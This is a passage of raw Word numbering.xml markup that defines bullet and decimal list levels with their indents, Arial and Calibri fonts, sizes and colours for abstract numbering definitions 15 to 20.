        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4D981092">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15271" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2B8F4D50"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B1CF580"/>
    <w:lvl w:ilvl="0" w:tplc="E3364030">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1224" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E398F186">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1989" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="503EEECC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2202" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A786703C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0F64C2E0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="8B142220">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5266" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A210C458">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8053" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DA5456DC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C7688560">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13626" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C817F3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E60A2AE"/>
    <w:lvl w:ilvl="0" w:tplc="7F5C5B90">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1089" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3B72ED96">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1809" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1A2097C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2529" w:hanging="449"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="D93EB46C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2203" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3F306FBA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2544" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D310AAFE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3264" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="88489A30">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3260" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B8FE6B6E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7245" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EAB6DC86">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11230" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2DDB5BC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="707E2056"/>
    <w:lvl w:ilvl="0" w:tplc="07EA0402">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1043" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="F928268C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1763" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="51E89912">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2483" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ABE275BE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4570" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="65CEEA9E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="3036E4C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8750" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1918279E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4F1AF2C4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12930" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FF3E8516">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F5207E8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1DAEE1C6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4199" w:hanging="1527"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="4"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4199" w:hanging="1527"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="FFFFFF"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="88"/>
        <w:szCs w:val="88"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1709" w:hanging="1198"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="774" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1559" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F9D51ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91841394"/>
    <w:lvl w:ilvl="0" w:tplc="8B8C14F4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1704" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4080C80C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2424" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="ECF284C2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3144" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="89029B36">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5147" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="025CD876">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7155" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CD90B784">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9162" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="EC44A96A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11170" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B3D44E62">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13177" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="614401E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15185" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="33557AA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B74A49B4"/>
    <w:lvl w:ilvl="0" w:tplc="0E261E1C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1324" w:hanging="388"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:color w:val="2E5496"/>
        <w:spacing w:val="0"/>
        <w:w w:val="67"/>
        <w:sz w:val="36"/>
        <w:szCs w:val="36"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="60C6F36E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2413" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="43720032">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3507" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E85A7044">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4601" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="5AA87ABC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5695" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="058E8F5C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6789" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="53D80900">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7883" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="B3A8A3BE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8977" w:hanging="388"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="431601EC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
